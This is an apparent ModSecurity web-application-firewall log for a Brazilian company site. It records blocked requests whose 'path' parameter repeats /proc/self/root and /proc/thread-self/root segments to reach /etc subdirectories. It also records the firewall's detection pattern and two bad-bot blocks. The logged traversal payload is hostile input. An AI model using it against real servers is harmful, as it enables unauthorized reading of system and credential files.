[Mon Mar 16 10:02:08.282463 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:49462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_UHjZBu2q05ozVU9GRQAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:10.683069 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.241.46:44428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_UnbQATo66fKoS7w9NAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:12.963350 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:44434] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_VLABkC4fWIHEf8HbEAAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:17.472901 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.241.46:44440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_WHjZBu2q05ozVU9GSwAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:24.227011 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.241.46:39456] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_YJqj1wV0Si-OkefZ0QAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:27.715898 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.241.46:39458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_Y5qj1wV0Si-OkefZ2QAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:47.184536 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.241.46:36848] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_d3jZBu2q05ozVU9GYAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:49.576283 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:41462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_ebysWC90G-1nBrA1bAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:53.134059 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:41476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_ff9ocpUE4ed4uDzdHgAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:03:13.275062 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:41478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_kbysWC90G-1nBrA1gAAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:03:15.577420 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:39358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_ktSswJuvopo3lOhQ0wAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:03:18.348530 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.244.31:40696] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf_ltSswJuvopo3lOhQ1gAAAIs"]
[Mon Mar 16 10:03:19.211089 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:39360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_l7ABkC4fWIHEf8HbOAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:03:53.837699 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.241.46:52736] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_uXbQATo66fKoS7w9_AAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:03:57.254981 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:41888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_vZqj1wV0Si-OkefaBwAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:05:50.369209 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:54834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgALv9ocpUE4ed4uDzeEQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:05:53.509198 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.228.16:60210] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgAMXjZBu2q05ozVU9GnQAAAVM"]
[Mon Mar 16 10:05:54.946692 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:44602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAMhXjF1vJNtV6CWrqFwAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:06:03.030373 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:44188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAO5qj1wV0Si-OkefaHAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:06:03.518690 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.243.203:58588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAO3bQATo66fKoS7w-XgAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:06:11.950036 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:56372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAQ7ysWC90G-1nBrA1qAAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:06:15.350116 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:49976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAR3bQATo66fKoS7w-YwAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:23.584925 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:49978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgATxXjF1vJNtV6CWrqIAAAAcQ"], referer: 